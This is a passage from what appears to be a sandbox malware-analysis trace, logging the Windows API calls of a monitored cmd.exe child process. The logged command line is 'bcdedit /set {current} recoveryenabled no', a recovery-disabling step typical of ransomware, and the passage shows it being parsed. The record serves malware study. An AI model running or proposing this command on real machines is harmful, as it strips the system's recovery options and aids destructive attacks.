dwFlags=0x0, lpMem=0x4f9f20 | out: hHeap=0x4e0000) returned 1 [0116.794] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef1d8 | out: lpAttributeList=0x2ef1d8) [0116.794] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.795] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.795] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.795] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0116.796] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.796] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0116.796] SetConsoleInputExeNameW () returned 0x1 [0116.796] GetConsoleOutputCP () returned 0x1b5 [0116.797] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0116.797] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.797] exit (_Code=0) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x48b46000" os_pid = "0x634" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" cmd_line = "\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0x48c [0113.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f770 | out: lpSystemTimeAsFileTime=0x14f770*(dwLowDateTime=0x2cd49c60, dwHighDateTime=0x1d5f7c9)) [0113.898] GetCurrentProcessId () returned 0x634 [0113.898] GetCurrentThreadId () returned 0x48c [0113.898] GetTickCount () returned 0x114a323 [0113.898] QueryPerformanceCounter (in: lpPerformanceCount=0x14f778 | out: lpPerformanceCount=0x14f778*=21992128155) returned 1 [0113.925] GetModuleHandleW (lpModuleName=0x0) returned 0x4abf0000 [0114.082] __set_app_type (_Type=0x1) [0114.082] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac17810) returned 0x0 [0114.082] __getmainargs (in: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610, _DoWildCard=0, _StartInfo=0x4ac1e0f4 | out: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610) returned 0 [0114.082] GetCurrentThreadId () returned 0x48c [0114.083] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x48c) returned 0x3c [0114.083] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.083] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0114.083] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.083] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.083] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f708 | out: phkResult=0x14f708*=0x0) returned 0x2 [0114.084] VirtualQuery (in: lpAddress=0x14f6f0, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0114.084] GetConsoleOutputCP () returned 0x1b5 [0114.084] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.085] SetConsoleCtrlHandler (HandlerRoutine=0x4ac13184, Add=1) returned 1 [0114.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.085] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.085] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0114.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.086] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.086] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.086] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0114.086] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.086] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.087] GetEnvironmentStringsW () returned 0x2c8b40* [0114.087] GetProcessHeap () returned 0x2b0000 [0114.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa7c) returned 0x2c95d0 [0114.087] FreeEnvironmentStringsW (penv=0x2c8b40) returned 1 [0114.088] GetProcessHeap () returned 0x2b0000 [0114.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2c89c0 [0114.088] GetEnvironmentStringsW () returned 0x2c8b40* [0114.088] GetProcessHeap () returned 0x2b0000 [0114.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa7c) returned 0x2ca060 [0114.088] FreeEnvironmentStringsW (penv=0x2c8b40) returned 1 [0114.088] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e5c8 | out: phkResult=0x14e5c8*=0x44) returned 0x0 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x18, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x0, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegCloseKey (hKey=0x44) returned 0x0 [0114.089] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e5c8 | out: phkResult=0x14e5c8*=0x44) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x0, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x9, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x9, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x9, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegCloseKey (hKey=0x44) returned 0x0 [0114.090] time (in: timer=0x0 | out: timer=0x0) returned 0x5e691d8d [0114.090] srand (_Seed=0x5e691d8d) [0114.090] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} recoveryenabled no" [0114.090] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} recoveryenabled no" [0114.090] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.090] GetProcessHeap () returned 0x2b0000 [0114.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2caaf0 [0114.090] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.091] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.091] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.091] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.091] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.091] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.091] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.091] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.091] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.091] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.091] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.091] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.092] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.092] GetProcessHeap () returned 0x2b0000 [0114.092] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c95d0 | out: hHeap=0x2b0000) returned 1 [0114.092] GetEnvironmentStringsW () returned 0x2c8b40* [0114.092] GetProcessHeap () returned 0x2b0000 [0114.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa94) returned 0x2cad10 [0114.092] FreeEnvironmentStringsW (penv=0x2c8b40) returned 1 [0114.092] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.092] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.093] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.093] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.093] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.093] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.093] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.093] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.093] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.093] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.094] GetProcessHeap () returned 0x2b0000 [0114.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x5c) returned 0x2cb7b0 [0114.094] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f3d0, lpFilePart=0x14f3b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f3b0*="Desktop") returned 0x25 [0114.094] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.094] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f0e0 | out: lpFindFileData=0x14f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2cb820 [0114.094] FindClose (in: hFindFile=0x2cb820 | out: hFindFile=0x2cb820) returned 1 [0114.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f0e0 | out: lpFindFileData=0x14f0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2cb820 [0114.095] FindClose (in: hFindFile=0x2cb820 | out: hFindFile=0x2cb820) returned 1 [0114.095] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.095] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f0e0 | out: lpFindFileData=0x14f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x218e9fe0, ftLastAccessTime.dwHighDateTime=0x1d5f7c9, ftLastWriteTime.dwLowDateTime=0x218e9fe0, ftLastWriteTime.dwHighDateTime=0x1d5f7c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2cb820 [0114.095] FindClose (in: hFindFile=0x2cb820 | out: hFindFile=0x2cb820) returned 1 [0114.095] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.096] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.096] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.096] GetProcessHeap () returned 0x2b0000 [0114.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cad10 | out: hHeap=0x2b0000) returned 1 [0114.096] GetEnvironmentStringsW () returned 0x2cb820* [0114.096] GetProcessHeap () returned 0x2b0000 [0114.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xae8) returned 0x2cc310 [0114.097] FreeEnvironmentStringsW (penv=0x2cb820) returned 1 [0114.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.097] GetProcessHeap () returned 0x2b0000 [0114.097] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb7b0 | out: hHeap=0x2b0000) returned 1 [0114.097] GetProcessHeap () returned 0x2b0000 [0114.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4016) returned 0x2cce00 [0114.098] GetProcessHeap () returned 0x2b0000 [0114.098] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x68) returned 0x2c9630 [0114.098] GetProcessHeap () returned 0x2b0000 [0114.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cce00 | out: hHeap=0x2b0000) returned 1 [0114.098] GetConsoleOutputCP () returned 0x1b5 [0114.099] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.099] GetUserDefaultLCID () returned 0x409 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac27b50, cchData=8 | out: lpLCData=":") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f4e0, cchData=128 | out: lpLCData="0") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f4e0, cchData=128 | out: lpLCData="0") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f4e0, cchData=128 | out: lpLCData="1") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac3a740, cchData=8 | out: lpLCData="/") returned 2 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac3a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac3a460, cchData=32 | out: lpLCData="Tue") returned 4 [0114.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac3a420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac3a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac3a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac3a360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac3a700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac27b40, cchData=8 | out: lpLCData=".") returned 2 [0114.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac3a4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.101] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.102] GetProcessHeap () returned 0x2b0000 [0114.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20c) returned 0x2c9710 [0114.103] GetConsoleTitleW (in: lpConsoleTitle=0x2c9710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.103] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.103] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.103] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.104] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.104] GetProcessHeap () returned 0x2b0000 [0114.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4012) returned 0x2cce00 [0114.104] GetProcessHeap () returned 0x2b0000 [0114.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cce00 | out: hHeap=0x2b0000) returned 1 [0114.106] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0114.106] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0114.106] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0114.106] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0114.106] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0114.107] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0114.107] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0114.107] GetProcessHeap () returned 0x2b0000 [0114.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0) returned 0x2c9930 [0114.107] GetProcessHeap () returned 0x2b0000 [0114.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20) returned 0x2c4670 [0114.109] GetProcessHeap () returned 0x2b0000 [0114.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x56) returned 0x2c99f0 [0114.111] GetConsoleTitleW (in: lpConsoleTitle=0x14f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.113] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.113] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.113] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.113] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.113] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0114.113] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.113] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.113] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0114.113] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.113] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.113] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.113] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0114.114] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.114] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.114] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.114] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.114] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.114] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.114] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0114.114] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.114] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.114] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.114] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.114] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.114] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.114] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0114.114] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.114] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.115] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.115] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.115] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.115] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.115] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0114.115] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.115] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.115] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.115] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.115] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.115] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.115] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0114.115] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0114.115] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.116] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.116] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.116] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.116] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.116] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0114.116] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.116] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.116] _wcsicmp (_String1="bcdedit", 